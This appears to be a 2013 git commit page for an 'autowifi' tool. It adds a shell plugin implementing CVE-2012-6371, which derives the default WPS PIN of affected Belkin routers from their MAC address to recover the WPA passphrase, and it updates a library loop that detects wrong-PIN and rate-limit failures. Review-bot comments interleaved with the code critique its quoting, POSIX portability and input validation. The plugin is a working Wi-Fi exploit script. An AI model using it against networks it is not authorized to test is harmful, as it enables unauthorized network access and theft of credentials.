| author | makefu <github@syntax-fehler.de> | 2013-05-26 14:06:53 +0200 | 
|---|---|---|
| committer | makefu <github@syntax-fehler.de> | 2013-05-26 14:06:53 +0200 | 
| commit | 5995257992d9b4d86313e3d78a85b68ffff0a2af (patch) | |
| tree | 8b21e64cb6a2f0b3fc9143adf2326c959d4fe6d1 | |
| parent | e7baf4ada0fa6b9aca40d9b237e84c23172ffdbd (diff) | |
add belkin WPS plugin
| -rw-r--r-- | usr/lib/autowifi/lib/wps | 16 | ||||
| -rwxr-xr-x | usr/lib/autowifi/plugins/11belkin_wps | 48 | 
2 files changed, 59 insertions, 5 deletions
| diff --git a/usr/lib/autowifi/lib/wps b/usr/lib/autowifi/lib/wps index 7fd38a26..8afd5b05 100644 --- a/usr/lib/autowifi/lib/wps +++ b/usr/lib/autowifi/lib/wps @@ -35,17 +35,23 @@ EOF  	    #*"WPA: Key negotiation completed"*)              # association failed              #    exit 1 ;; +      if ( tail -f $WPA_LOG & echo "TAILPID: $!" )| while read line ; do +        bye(){ +            kill -HUP $TAILPID +            exit $1 +        } +        echo $line          case "$line" in -	    TAILPID:*)IFS=" " set -- $line; TAILPID=$2;; +            TAILPID:*)IFS=" " set -- $line; TAILPID=$2;; +            *"WPS-FAIL msg=10 config_error=18"*) bye 1 ;; # wrong pin +            *"CTRL-EVENT-EAP-FAILURE EAP authentication failed"*) bye 1;; # rate limiting              *CTRL-EVENT-DISCONNECTED*):;; -            *CTRL-EVENT-CONNECTED*) -		kill -HUP $TAILPID -                exit 0;; +            *CTRL-EVENT-CONNECTED*) bye 0;; #yay connected          esac      done ; then -	echo "Connected!" +	#echo "Connected!"  	sed -n 's/[ \t]*psk="\(.*\)"$/\1/p' $WPA_CONF  	return 0      else diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps new file mode 100755 index 00000000..93dd447a --- /dev/null +++ b/usr/lib/autowifi/plugins/11belkin_wps 
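Review bot: The added `echo $line` in the read loop writes every wpa_supplicant log line to stdout, the same stream on which the `sed` line after `done ; then` prints the psk, so a caller that captures the function's output would get log text mixed in with the key; it is also unquoted, so each line is word-split and glob-expanded. Sending it to stderr with `printf '%s\n' "$line" >&2` keeps the key stream clean, which appears to be the reason `echo "Connected!"` was commented out in this same hunk. `bye()` is redefined on every iteration and runs `kill -HUP $TAILPID` even when a failure line is matched before the `TAILPID:` line has been read, so it is safer defined once ahead of the loop with `[ -n "$TAILPID" ] && kill -HUP "$TAILPID"`. The enclosing function starts and ends outside the hunk.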
@@ -0,0 +1,48 @@
+#!/bin/sh
+# thanks to http://ednolo.alumnos.upv.es/?p=1295G
+# for the PoC code 
+# Calculates the default WPS pin of Belkin Routers and returns the WPA key
+#
+# Implementation of CVE-2012-6371
+
+# works :
+# Belkin_N+_XXXXXX   00:22:75:XX:XX:XX    F5D8235-4 v1000
+# belkin.XXX         00:1C:DF:XX:XX:XX    F5D8231-4 v5000
+# belkin.XXX         09:86:3B:XX:XX:XX    F9K1104   v1000
+
+cd $(dirname $(readlink -f $0))
+. ../lib/core
+. ../lib/wps
+parse_args $@
+
+MAC=$(printf "%s" $2| sed 's/://g')
+if [ ${#MAC} -ne 12 ] ;then
+    echo "MAC malformed"
+    exit 1
+fi
+VENDOR_MAC=${MAC:0:6}
+PRIVATE_MAC=${MAC:6:12}
+if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then
+    echo "VENDOR MAC $VENDOR_MAC not affected"
+    exit 1
+fi
+
+calc_belkin(){
+    PRIVATE_MAC=${1}
+
+    p=$((0x$PRIVATE_MAC % 10000000))
+    wps_pin_checksum(){
+        pin=$1
+        accum=0
+        while [ $pin -ne 0 ];do
+            accum=$((accum + (3 * (pin % 10)) ))
+            pin=$((pin/10))
+            accum=$((accum + pin %10 ))
+            pin=$((pin/10))
+        done
+        echo $(( (10 - accum % 10) % 10))
+    }
+    printf "%07d%d" $p $(wps_pin_checksum $p)
+    return 0
+}
+try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC}) |
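Review bot: `MAC` is derived from `$2` and checked only for length, so any 12 characters that pass the vendor-prefix test reach the arithmetic expansion `$((0x$PRIVATE_MAC % 10000000))`; a hex check placed before the split, `case "$MAC" in *[!0-9A-Fa-f]*) echo "MAC malformed" >&2; exit 1;; esac`, closes that off. The script declares `#!/bin/sh` but relies on `${MAC:0:6}` substring expansion and on `==` and `-o` inside `[`, none of which are POSIX, so it fails under shells such as dash; either the shebang should name bash or the portable forms should be used. `$0`, `$2` and `$@` are also expanded unquoted, so an argument containing whitespace or glob characters (presumably the network name travels in `$@`) is split before it reaches `parse_args` and `try_wps_pin`; `"$@"` and `"$2"` are the safe forms.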
